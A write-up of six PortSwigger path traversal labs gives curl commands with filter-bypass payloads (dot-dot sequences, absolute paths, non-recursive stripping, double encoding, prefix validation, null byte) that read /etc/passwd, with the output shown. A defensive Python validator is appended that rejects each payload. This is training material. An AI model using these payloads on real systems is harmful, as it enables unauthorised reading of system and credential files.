Path Traversal - [PortSwigger]

Marmeus

    Introduction

    This post compiles every Apprentice and Practitioner lab on path traversal from PortSwigger's Web Security Academy.

    File path traversal, simple case [Apprentice]

    Intercepting the page load, there are many requests to endpoints such as /image?filename=48.jpg.

    Note: If you do not see them in Burp's HTTP history, open the HTTP filter settings, go to "Filter by MIME type", and tick "Images".

    Trying the basic traversal sequence, we obtain the file.

    kali@kali:~$ curl https://<LAB_DOMAIN>.web-security-academy.net/image?filename=../../../../../etc/passwd
    root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
    bin:x:2:2:bin:/bin:/usr/sbin/nologin
    sys:x:3:3:sys:/dev:/usr/sbin/nologin
    sync:x:4:65534:sync:/bin:/bin/sync
    games:x:5:60:games:/usr/games:/usr/sbin/nologin
    man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
    [...]

    File path traversal, traversal sequences blocked with absolute path bypass [Practitioner]

    Same as the previous exercise, but this time traversal sequences are blocked and an absolute path has to be supplied instead.

    kali@kali:~$ curl https://<LAB_DOMAIN>.web-security-academy.net/image?filename=/etc/passwd
    root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
    bin:x:2:2:bin:/bin:/usr/sbin/nologin
    sys:x:3:3:sys:/dev:/usr/sbin/nologin
    [...]

    File path traversal, traversal sequences stripped non-recursively [Practitioner]

    Because the server strips ../ but does not do so recursively, we can craft a string that, after the replacement, turns into ../.

    kali@kali:~$ curl https://<LAB_DOMAIN>.web-security-academy.net/image?filename=....//....//....//etc/passwd
    root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
    bin:x:2:2:bin:/bin:/usr/sbin/nologin
    sys:x:3:3:sys:/dev:/usr/sbin/nologin
    

    File path traversal, traversal sequences stripped with superfluous URL-decode [Practitioner]

    Because the application URL-decodes the input only once before checking it (the superfluous decode happens later), double URL-encoding the "/" character bypasses the filter.

    kali@kali:~$ curl https://<LAB_DOMAIN>.web-security-academy.net/image?filename=..%25%32%66..%25%32%66..%25%32%66etc/passwd
    root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
    bin:x:2:2:bin:/bin:/usr/sbin/nologin
    [...]

    File path traversal, validation of start of path [Practitioner]

    Because the server checks that the filename parameter starts with /var/www/images/, the traversal sequence has to come after that prefix.

    kali@kali:~$ curl https://<LAB_DOMAIN>.web-security-academy.net/image?filename=/var/www/images/../../../etc/passwd
    root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
    bin:x:2:2:bin:/bin:/usr/sbin/nologin
    [...]

    File path traversal, validation of file extension with null byte bypass [Practitioner]

    Because the lab checks that the string ends with .jpg, you need a null byte ("%00") to terminate the file path before the required extension: the check sees the whole string, while the file API stops reading at the null byte.

    kali@kali:~$ curl https://<LAB_DOMAIN>.web-security-academy.net/image?filename=../../../../etc/passwd%0047.jpg
    root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
    bin:x:2:2:bin:/bin:/usr/sbin/nologin
    [...]
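All six labs share one root cause: the filter inspects the raw request string while the filesystem ends up opening something else. As an added example (not part of the original post and not PortSwigger's code), here is a Python check that decides on the decoded, resolved path and is run against each payload from the labs above; the base directory /var/www/images/ comes from the lab, everything else is assumed:

```python
import posixpath
from urllib.parse import unquote

# Constructed for this example; the labs serve images from /var/www/images/.
BASE_DIR = "/var/www/images"

def safe_image_path(filename, base_dir=BASE_DIR):
    """Return (resolved_path, "ok") or (None, reason); decides on the decoded, normalised path only."""
    base_dir = posixpath.normpath(base_dir)
    # Decode until stable so %2f, %252f and %25%32%66 all collapse to "/".
    decoded = filename
    for _ in range(4):
        once = unquote(decoded)
        if once == decoded:
            break
        decoded = once
    # A NUL byte truncates the name in C-backed file APIs, so an extension
    # check on the full string says nothing about what is actually opened.
    if "\x00" in decoded:
        return None, "null byte"
    # posixpath.join discards base_dir when decoded is absolute, which is why
    # the containment check below runs on the resolved path, not the input.
    resolved = posixpath.normpath(posixpath.join(base_dir, decoded))
    # startswith(base_dir) is not enough: /var/www/images/../../../etc/passwd
    # passes it but resolves to /etc/passwd; commonpath compares components.
    if posixpath.commonpath([base_dir, resolved]) != base_dir:
        return None, "outside base directory"
    # "....//" survives normpath as an ordinary directory name: it only turns
    # into ../ for code that strips "../" first. Validate; never strip.
    if not resolved.endswith(".jpg"):
        return None, "not a .jpg"
    return resolved, "ok"

# The six payloads from the labs above, copied from the post's curl commands.
LAB_PAYLOADS = {
    "simple": "../../../../../etc/passwd",
    "absolute": "/etc/passwd",
    "non-recursive": "....//....//....//etc/passwd",
    "double-decode": "..%25%32%66..%25%32%66..%25%32%66etc/passwd",
    "start-of-path": "/var/www/images/../../../etc/passwd",
    "null-byte": "../../../../etc/passwd%0047.jpg",
}

def check_all(payloads=LAB_PAYLOADS):
    """Map each lab payload to the reason the hardened check rejects it."""
    return {name: safe_image_path(p)[1] for name, p in payloads.items()}

if __name__ == "__main__":
    for name, reason in check_all().items():
        print(f"{name:14} -> {reason}")
```

In production the normalised path should additionally be resolved with os.path.realpath once the file is known to exist, so symlinks inside the image directory cannot point back out of it.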